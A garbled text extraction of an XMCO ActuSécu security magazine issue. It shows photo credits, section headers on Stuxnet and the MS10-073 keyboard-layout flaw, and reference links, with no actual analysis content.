http://www.ickr.com/photos/judeanpeoplesfront/ * Sharon Pruitt (pinksherbet): http://www.ickr.com/photos/pinksherbet/ * Daniel Horacio (dhammza) http://www.ickr.com/photos/dhammza * Saad Irfan (saadirfan) http://www.ickr.com/photos/saadirfan/ * Jeff Keyzer (mightyohm): http://www.ickr.com/photos/mightyohm/ * Vanessa Lynn (vanessa_lynn): http://www.ickr.com/photos/vanessa_lynn/ * BlackburnMike_1 / Mike Blackburn: http://www.ickr.com/photos/mikeblackburn/: * Nick Fisher (cobrasick): http://www.ickr.com/photos/cobrasick/ * The Consumerist: http://www.ickr.com/photos/consumerist// * Shorts and Longs | The Both And (48424574@N07/) http://www.ickr.com/photos/48424574@N07 *AlaskaTeacher (alstonfamily): http://www.ickr.com/photos/alstonfamily/ * Exakta: http://www.ickr.com/photos/exakta/ * Seth Anderson (swanksalot): http://www.ickr.com/photos/swanksalot/3820698076/ sizes/z/in/photostream/ http://www.b12partners.net/wp/
Photos of articles
* Karsten Kneese (karstenkneese): http://www.ickr.com/photos/karstenkneese/ * Trey Ratcliff (stuckincustoms) http://www.ickr.com/photos/stuckincustoms/ * Ludo Benoit (pics_troy): http://www.ickr.com/photos/pics_troy/ * Bjoern Schwarz (bagalute): http://www.ickr.com/people/bagalute/ * Shelly Munkberg (zingersb): http://www.ickr.com/photos/zingersb/ * Stfan Le D (st3f4n): http://www.ickr.com/photos/st3f4n/ * Jon (xlibber): http://www.ickr.com/photos/xlibber/ * Wade Kelly (wader): http://www.ickr.com/photos/wader/ * emdot http://www.ickr.com/photos/emdot/ * Michael LaCalameto (stopthegears): http://www.ickr.com/photos/stopthegears/ * Rob Shenk (rcsj): http://www.ickr.com/photos/rcsj/ * -JvL- (-jlv-): http://www.ickr.com/people/-jvl-/ * Gordon (judeanpeoplesfront):
[57]
WWW.XMCO.FR
ACTU SCU 27
About ActuScu ActuScu is a digital magazine written and published by the consultants of the XMCO Partners consultancy. Its purpose is to give clear and detailed presentations on IT security in complete independence. All editions of ActuScu can be downloaded from the following address (french and english versions): http://www.xmco.fr/actualite-securite-vulnerabilite-fr.html
About XMCO Partners Founded in 2002 by experts in security and managed by its founders, we work in the form of xed-fee projects with a commitment to achieve results. Intrusion tests, PCI DSS security audits and vulnerability monitoring (CERT-XMCO) are the major areas in which our rm is developing. At the same time, we work with senior management on assignments providing support to heads of information-systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts.
Contact XMCO Partners To contact XMCO Partners and obtain information about our business: +33 (0)01 47 34 68 61.
http://www.xmco.fr http://cert.xmco.fr
[58]
WWW.XMCO.FR

Stuxnet: Analysis, Myths, Realities

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Stuxnet: Analysis, Myths, Realities

Uploaded by

Copyright:

Available Formats

ACTUSCU 27

S REALITIE ND MYTHS A IS, : ANALYS STUXNET

To contact XMCO Partners and discover our services: http://www.xmco.fr

We wish you a happy 2011

THE XMCO AGENDA

BOOKMARKS AND TOOLS

Keyboard Layout vulnerability......................29

Analysis of the "elevation of privileges" vulnerability

used by Stuxnet (MS10-073).

STUXNET PART I: HISTORY, MYTHS AND REALITIES

Stuxnet, elected malware of the year

Stuxnet is a complex piece of malware

STUXNET PART I: HISTORY, MYTHS AND REALITIES

STUXNET PART I: HISTORY, MYTHS AND REALITIES

STUXNET PART I: HISTORY, MYTHS AND REALITIES

STUXNET PART I: HISTORY, MYTHS AND REALITIES

In this scenario described by the Times,

STUXNET PART I: HISTORY, MYTHS AND REALITIES

STUXNET PART I: HISTORY, MYTHS AND REALITIES

information revealed by the various observers is always subjective

STUXNET PART I: HISTORY, MYTHS AND REALITIES

STUXNETPART II: TECHNICAL ANALYSIS

Stuxnet, elected malware of the year

STUXNET PART II: TECHNICAL ANALYSIS

The authors of Stuxnet used no less than

STUXNET PART II: TECHNICAL ANALYSIS

Zbot: http://blogs.technet.com/b/mmpc/archive/ 2010/10/12/msrt-on-zbot-the-botnet-in-abox.aspx

STUXNET PART II: TECHNICAL ANALYSIS

STUXNET PART II: TECHNICAL ANALYSIS

Several other functionalities useful to the malware's

STUXNET PART II: TECHNICAL ANALYSIS

0x6E, 0x72, 0x5C, 0x5E,

STUXNET PART II: TECHNICAL ANALYSIS

Lastly, to maximize the efficiency of the

STUXNET PART II: TECHNICAL ANALYSIS

STUXNET PART II: TECHNICAL ANALYSIS

SCADA: Supervisory Control And Acquisition (tlsurveillance acquisition de donnes)

STUXNET PART II: TECHNICAL ANALYSIS

STUXNET PART II: TECHNICAL ANALYSIS

STUXNET PART II: TECHNICAL ANALYSIS

The purpose of this code sequence is to

STUXNET PART II: TECHNICAL ANALYSIS

Once Stuxnet has identified and infected

STUXNET PART II: TECHNICAL ANALYSIS

STUXNET PART II: TECHNICAL ANALYSIS

STUXNET PART II: TECHNICAL ANALYSIS

Resources on Stuxnet http://blog.eset.com/2011/01/03/stuxnet-informationand-resources

F-Secure (FAQ) h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / 00002040.html h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / 00002066.html

Langner (Blog) http://www.langner.com/en/blog/ h t t p : / / w w w. c o n t r o l g l o b a l . c o m / a r t i c l e s / 2 0 11 / IndustrialControllers1101.html?page=print " " LEXSI http://cert.lexsi.com/weblog/index.php/2011/01/31/397dossier-stuxnet-de-la-vulnerabilite-lnk-au-sabotageindustriel

ISIS - Institute for Science and International Security http://isis-online.org/isis-reports/detail/did-stuxnet-takeout-1000-centrifuges-at-the-natanz-enrichment-plant/8

Florent Hochwelker XMCO

A program executed by an ordinary user

KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY

BreakPoint on the system call

KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY

Libraries corresponding to the various Keyboard Layouts present under Windows XP

KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY

Analysis of the vulnerability

For example, by specifying an index of 5,

* Free OS compatible with Windows XP

KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY

Dclenchement de lappel de NtUserLoadKeyboardLayoutEx

KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY